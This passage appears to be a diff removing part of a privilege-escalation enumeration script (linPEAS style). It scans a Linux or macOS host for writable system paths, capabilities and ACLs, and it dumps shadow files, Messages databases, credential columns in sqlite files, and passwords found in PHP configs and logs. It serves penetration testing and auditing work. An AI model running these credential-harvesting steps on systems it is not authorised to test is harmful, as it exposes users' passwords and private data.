- timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" - printf "$NC" - echo "" - fi - fi - fi - fi - fi - done; - echo "" - - ##-- IF) Misconfigured ld.so - print_2title "Checking misconfigurations of ld.so" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" - printf $ITALIC"/etc/ld.so.conf\n"$NC; - cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat /etc/ld.so.conf 2>/dev/null | while read l; do - if echo "$l" | grep -q include; then - ini_path=$(echo "$l" | cut -d " " -f 2) - fpath=$(dirname "$ini_path") - if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - for f in $fpath/*; do - printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" - done - fi - done - echo "" - - ##-- IF) Capabilities - print_2title "Capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - echo "Current capabilities:" - (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" - (cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" - echo "" - echo "Shell capabilities:" - (capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" - (cat "/proc/$PPID/status" | grep Cap | sed 
-${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" - echo "" - echo "Files with capabilities (limited to 50):" - getcap -r / 2>/dev/null | head -n 50 | while read cb; do - capsVB_vuln="" - - for capVB in $capsVB; do - capname="$(echo $capVB | cut -d ':' -f 1)" - capbins="$(echo $capVB | cut -d ':' -f 2)" - if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then - echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," - capsVB_vuln="1" - break - fi - done - - if ! [ "$capsVB_vuln" ]; then - echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," - fi - - if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then - echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," - fi - done - echo "" - - ##-- IF) Users with capabilities - print_2title "Users with capabilities" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" - if [ -f "/etc/security/capability.conf" ]; then - grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - else echo_not_found "/etc/security/capability.conf" - fi - echo "" - - ##-- IF) Files with ACLs - print_2title "Files with ACLs (limited to 50)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" - ( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - - if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) - ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," - fi - echo "" - - ##-- IF) Files with ResourceFork - #if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER - # print_2title "Files with ResourceFork" - # print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" - # find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" - #fi - #echo "" - - ##-- IF) .sh files in PATH - print_2title ".sh files in path" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" - echo $PATH | tr ":" "\n" | while read d; do - for f in $(find "$d" -name "*.sh" 2>/dev/null); do - if ! [ "$IAMROOT" ] && [ -O "$f" ]; then - echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," - elif ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) - echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else - echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; - fi - done - done - echo "" - - print_2title "Broken links in path" - echo $PATH | tr ":" "\n" | while read d; do - find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; - done - echo "" - - - if [ "$MACPEAS" ]; then - print_2title "Unsigned Applications" - macosNotSigned /System/Applications - fi - - ##-- IF) Unexpected folders in / - print_2title "Unexpected in root" - if [ "$MACPEAS" ]; then - (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - else - (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found - fi - echo "" - - ##-- IF) Files (scripts) in /etc/profile.d/ - print_2title "Files (scripts) in /etc/profile.d/" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" - if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Files (scripts) in /etc/init.d/ - print_2title "Permissions in init, init.d, systemd, and rc.d" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" - if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS - if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! 
[ "$IAMROOT" ] && [ -w "/lib/systemd/" ]; then echo "You have write privileges over /lib/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - if ! [ "$IAMROOT" ] && [ "$(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /lib/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi - fi - echo "" - - ##-- IF) Hashes in passwd file - print_list "Hashes inside passwd file? ........... " - if grep -qv '^[^:]*:[x\*\!]\|^#\|^$' /etc/passwd /etc/master.passwd /etc/group 2>/dev/null; then grep -v '^[^:]*:[x\*]\|^#\|^$' /etc/passwd /etc/pwd.db /etc/master.passwd /etc/group 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Writable in passwd file - print_list "Writable passwd file? ................ " - if [ -w "/etc/passwd" ]; then echo "/etc/passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/pwd.db" ]; then echo "/etc/pwd.db is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ -w "/etc/master.passwd" ]; then echo "/etc/master.passwd is writable" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Credentials in fstab - print_list "Credentials in fstab/mtab? ........... " - if grep -qE "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null; then grep -E "(user|username|login|pass|password|pw|credentials)[=:]" /etc/fstab /etc/mtab 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - ##-- IF) Read shadow files - print_list "Can I read shadow files? ............. 
" - if [ "$(cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null)" ]; then cat /etc/shadow /etc/shadow- /etc/shadow~ /etc/gshadow /etc/gshadow- /etc/master.passwd /etc/spwd.db 2>/dev/null | sed -${E} "s,.*,${SED_RED}," - else echo_no - fi - - print_list "Can I read shadow plists? ............ " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - print_list "Can I write shadow plists? ........... " - possible_check="" - (for l in /var/db/dslocal/nodes/Default/users/*; do if [ -w "$l" ];then echo "$l"; possible_check="1"; fi; done; if ! [ "$possible_check" ]; then echo_no; fi) 2>/dev/null || echo_no - - ##-- IF) Read opasswd file - print_list "Can I read opasswd file? ............. " - if [ -r "/etc/security/opasswd" ]; then cat /etc/security/opasswd 2>/dev/null || echo "" - else echo_no - fi - - ##-- IF) network-scripts - print_list "Can I write in network-scripts? ...... " - if ! [ "$IAMROOT" ] && [ -w "/etc/sysconfig/network-scripts/" ]; then echo "You have write privileges on /etc/sysconfig/network-scripts/" | sed -${E} "s,.*,${SED_RED_YELLOW}," - elif [ "$(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges on $(find /etc/sysconfig/network-scripts/ '(' -not -type l -and '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW}," - else echo_no - fi - - ##-- IF) Read root dir - print_list "Can I read root folder? .............. 
" - (ls -al /root/ 2>/dev/null | grep -vi "total 0") || echo_no - echo "" - - ##-- IF) Root files in home dirs - print_2title "Searching root files in home dirs (limit 30)" - (find $HOMESEARCH /Users -user root 2>/dev/null | head -n 30 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_RED},") || echo_not_found - echo "" - - ##-- IF) Others files in my dirs - if ! [ "$IAMROOT" ]; then - print_2title "Searching folders owned by me containing others files on it (limit 100)" - (find / -type d -user "$USER" ! -path "/proc/*" 2>/dev/null | head -n 100 | while read d; do find "$d" -maxdepth 1 ! -user "$USER" \( -type f -or -type d \) -exec dirname {} \; 2>/dev/null; done) | sort | uniq | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed "s,root,${C}[1;13m&${C}[0m,g" - echo "" - fi - - ##-- IF) Readable files belonging to root and not world readable - if ! [ "$IAMROOT" ]; then - print_2title "Readable files belonging to root and readable by me but not world readable" - (find / -type f -user root ! -perm -o=r 2>/dev/null | grep -v "\.journal" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null | sed -${E} "s,/.*,${SED_RED},"; fi; done) || echo_not_found - echo "" - fi - - ##-- IF) Modified interesting files into specific folders in the last 5mins - print_2title "Modified interesting files in the last 5mins (limit 100)" - find / -type f -mmin -5 ! -path "/proc/*" ! -path "/sys/*" ! -path "/run/*" ! -path "/dev/*" ! -path "/var/lib/*" ! 
-path "/private/var/*" 2>/dev/null | grep -v "/linpeas" | head -n 100 | sed -${E} "s,$Wfolders,${SED_RED}," - echo "" - - ##-- IF) Writable log files - print_2title "Writable log files (logrotten) (limit 100)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#logrotate-exploitation" - logrotate --version 2>/dev/null || echo_not_found "logrotate" - lastWlogFolder="ImPOsSiBleeElastWlogFolder" - logfind=$(find / -type f -name "*.log" -o -name "*.log.*" 2>/dev/null | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 3){ print line_init; }; if (cont == "3"){print "#)You_can_write_more_log_files_inside_last_directory"}; pre=act}' | head -n 100) - printf "%s\n" "$logfind" | while read log; do - if ! [ "$IAMROOT" ] && [ "$log" ] && [ -w "$log" ] || ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders"; then #Only print info if something interesting found - if echo "$log" | grep -q "You_can_write_more_log_files_inside_last_directory"; then printf $ITALIC"$log\n"$NC; - elif ! [ "$IAMROOT" ] && [ -w "$log" ] && [ "$(command -v logrotate 2>/dev/null)" ] && logrotate --version 2>&1 | grep -qE ' 1| 2| 3.1'; then printf "Writable:$RED $log\n"$NC; #Check vuln version of logrotate is used and print red in that case - elif ! [ "$IAMROOT" ] && [ -w "$log" ]; then echo "Writable: $log"; - elif ! [ "$IAMROOT" ] && echo "$log" | grep -qE "$Wfolders" && [ "$log" ] && [ ! 
"$lastWlogFolder" == "$log" ]; then lastWlogFolder="$log"; echo "Writable folder: $log" | sed -${E} "s,$Wfolders,${SED_RED},g"; - fi - fi - done - - echo "" - - ##-- IF) Files inside my home - print_2title "Files inside $HOME (limit 20)" - (ls -la $HOME 2>/dev/null | head -n 23) || echo_not_found - echo "" - - ##-- IF) Files inside /home - print_2title "Files inside others home (limit 20)" - (find $HOMESEARCH /Users -type f 2>/dev/null | grep -v -i "/"$USER | head -n 20) || echo_not_found - echo "" - - ##-- IF) Mail applications - print_2title "Searching installed mail applications" - ls /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /etc 2>/dev/null | grep -Ewi "$mail_apps" - echo "" - - ##-- IF) Mails - print_2title "Mails (limit 50)" - (find /var/mail/ /var/spool/mail/ /private/var/mail -type f -ls 2>/dev/null | head -n 50 | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,$USER,${SED_RED},g" | sed "s,root,${SED_GREEN},g") || echo_not_found - echo "" - - ##-- IF) Backup folders - print_2title "Backup folders" - printf "%s\n" "$backup_folders" | while read b ; do - ls -ld "$b" 2> /dev/null | sed -${E} "s,backups|backup,${SED_RED},g"; - ls -l "$b" 2>/dev/null && echo "" - done - echo "" - - ##-- IF) Backup files - print_2title "Backup files (limited 100)" - backs=$(find / -type f \( -name "*backup*" -o -name "*\.bak" -o -name "*\.bak\.*" -o -name "*\.bck" -o -name "*\.bck\.*" -o -name "*\.bk" -o -name "*\.bk\.*" -o -name "*\.old" -o -name "*\.old\.*" \) -not -path "/proc/*" 2>/dev/null) - printf "%s\n" "$backs" | head -n 100 | while read b ; do - if [ -r "$b" ]; then - ls -l "$b" | grep -Ev "$notBackup" | grep -Ev "$notExtensions" | sed -${E} "s,backup|bck|\.bak|\.old,${SED_RED},g"; - fi; - done - echo "" - - ##-- IF) DB files - if [ "$MACPEAS" ]; then - print_2title "Reading messages database" - sqlite3 $HOME/Library/Messages/chat.db 'select * from message' 2>/dev/null - 
sqlite3 $HOME/Library/Messages/chat.db 'select * from attachment' 2>/dev/null - sqlite3 $HOME/Library/Messages/chat.db 'select * from deleted_messages' 2>/dev/null - - fi - print_2title "Searching tables inside readable .db/.sql/.sqlite files (limit 100)" - FILECMD="$(command -v file 2>/dev/null)" - if [ "$PSTORAGE_DATABASE" ]; then - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if [ "$FILECMD" ]; then - echo "Found: $(file $f)" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - else - echo "Found: $f" | sed -${E} "s,\.db|\.sql|\.sqlite|\.sqlite3,${SED_RED},g"; - fi - done - SQLITEPYTHON="" - echo "" - printf "%s\n" "$PSTORAGE_DATABASE" | while read f; do - if ([ -r "$f" ] && [ "$FILECMD" ] && file "$f" | grep -qi sqlite) || ([ -r "$f" ] && [ ! "$FILECMD" ]); then #If readable and filecmd and sqlite, or readable and not filecmd - printf $GREEN" -> Extracting tables from$NC $f $DG(limit 20)\n"$NC - if [ "$(command -v sqlite3 2>/dev/null)" ]; then - tables=$(sqlite3 $f ".tables" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - elif [ "$(command -v python 2>/dev/null)" ] || [ "$(command -v python3 2>/dev/null)" ]; then - SQLITEPYTHON=$(command -v python 2>/dev/null || command -v python3 2>/dev/null) - tables=$($SQLITEPYTHON -c "print('\n'.join([t[0] for t in __import__('sqlite3').connect('$f').cursor().execute('SELECT name FROM sqlite_master WHERE type=\'table\' and tbl_name NOT like \'sqlite_%\';').fetchall()]))" 2>/dev/null) - #printf "$tables\n" | sed "s,user.*\|credential.*,${SED_RED},g" - else - tables="" - fi - if [ "$tables" ]; then - printf "%s\n" "$tables" | while read t; do - columns="" - # Search for credentials inside the table using sqlite3 - if [ -z "$SQLITEPYTHON" ]; then - columns=$(sqlite3 $f ".schema $t" 2>/dev/null | grep "CREATE TABLE") - # Search for credentials inside the table using python - else - columns=$($SQLITEPYTHON -c "print(__import__('sqlite3').connect('$f').cursor().execute('SELECT 
sql FROM sqlite_master WHERE type!=\'meta\' AND sql NOT NULL AND name =\'$t\';').fetchall()[0][0])" 2>/dev/null) - fi - #Check found columns for interesting fields - INTCOLUMN=$(echo "$columns" | grep -i "username\|passw\|credential\|email\|hash\|salt") - if [ "$INTCOLUMN" ]; then - printf ${BLUE}" --> Found interesting column names in$NC $t $DG(output limit 10)\n"$NC | sed -${E} "s,user.*|credential.*,${SED_RED},g" - printf "$columns\n" | sed -${E} "s,username|passw|credential|email|hash|salt|$t,${SED_RED},g" - (sqlite3 $f "select * from $t" || $SQLITEPYTHON -c "print(', '.join([str(x) for x in __import__('sqlite3').connect('$f').cursor().execute('SELECT * FROM \'$t\';').fetchall()[0]]))") 2>/dev/null | head - fi - done - echo "" - fi - fi - done - fi - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Downloaded Files" - sqlite3 ~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2 'select LSQuarantineAgentName, LSQuarantineDataURLString, LSQuarantineOriginURLString, date(LSQuarantineTimeStamp + 978307200, "unixepoch") as downloadedDate from LSQuarantineEvent order by LSQuarantineTimeStamp' | sort | grep -Ev "\|\|\|" - fi - - ##-- IF) Web files - print_2title "Web files?(output limit)" - ls -alhR /var/www/ 2>/dev/null | head - ls -alhR /srv/www/htdocs/ 2>/dev/null | head - ls -alhR /usr/local/www/apache22/data/ 2>/dev/null | head - ls -alhR /opt/lampp/htdocs/ 2>/dev/null | head - echo "" - - ##-- IF) All hidden files - print_2title "All hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)" - find / -type f -iname ".*" ! -path "/sys/*" ! -path "/System/*" ! 
-path "/private/var/*" -exec ls -l {} \; 2>/dev/null | grep -Ev "$INT_HIDDEN_FILES" | grep -Ev "_history$|\.gitignore|.npmignore|\.listing|\.ignore|\.uuid|\.depend|\.placeholder|\.gitkeep|\.keep|\.keepme" | head -n 70 - echo "" - - ##-- IF) Readable files in /tmp, /var/tmp, bachups - print_2title "Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)" - filstmpback=$(find /tmp /var/tmp /private/tmp /private/var/at/tmp /private/var/tmp $backup_folders_row -type f 2>/dev/null | head -n 70) - printf "%s\n" "$filstmpback" | while read f; do if [ -r "$f" ]; then ls -l "$f" 2>/dev/null; fi; done - echo "" - - ##-- IF) Interesting writable files by ownership or all - if ! [ "$IAMROOT" ]; then - print_2title "Interesting writable files owned by me or writable by everyone (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - #In the next file, you need to specify type "d" and "f" to avoid fake link files apparently writable by all - obmowbe=$(find / '(' -type f -or -type d ')' '(' '(' -user $USER ')' -or '(' -perm -o=w ')' ')' ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | sort | uniq | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$obmowbe" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -qE "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - echo "" - fi - - ##-- IF) Interesting writable files by group - if ! 
[ "$IAMROOT" ]; then - print_2title "Interesting GROUP writable files (not in Home) (max 500)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files" - for g in $(groups); do - printf " Group $GREEN$g:\n$NC"; - iwfbg=$(find / '(' -type f -or -type d ')' -group $g -perm -g=w ! -path "/proc/*" ! -path "/sys/*" ! -path "$HOME/*" 2>/dev/null | grep -Ev "$notExtensions" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (act == pre){(cont += 1)} else {cont=0}; if (cont < 5){ print line_init; } if (cont == "5"){print "#)You_can_write_even_more_files_inside_last_directory\n"}; pre=act }' | head -n500) - printf "%s\n" "$iwfbg" | while read entry; do - if echo "$entry" | grep -q "You_can_write_even_more_files_inside_last_directory"; then printf $ITALIC"$entry\n"$NC; - elif echo "$entry" | grep -Eq "$writeVB"; then - echo "$entry" | sed -${E} "s,$writeVB,${SED_RED_YELLOW}," - else - echo "$entry" | sed -${E} "s,$writeB,${SED_RED}," - fi - done - done - echo "" - fi - - ##-- IF) Passwords in config PHP files - print_2title "Searching passwords in config PHP files" - printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep -EiI "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" "$c" 2>/dev/null | grep -Ev "function|password.*= ?\"\"|password.*= ?''" | sed '/^.\{150\}./d' | sort | uniq | sed -${E} "s,[pP][aA][sS][sS][wW]|[dD][bB]_[pP][aA][sS][sS],${SED_RED},g"; done - echo "" - - ##-- IF) TTY passwords - print_2title "Checking for TTY (sudo/su) passwords in audit logs" - aureport --tty 2>/dev/null | grep -E "su |sudo " | sed -${E} "s,su|sudo,${SED_RED},g" - find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g" - echo "" - - ##-- IF) IPs inside logs - print_2title "Finding IPs inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o 
"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70 - echo "" - - ##-- IF) Passwords inside logs - print_2title "Finding passwords inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED}," - echo "" - - ##-- IF) Emails inside logs - print_2title "Finding emails inside logs (limit 70)" - (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g" - echo "" - - 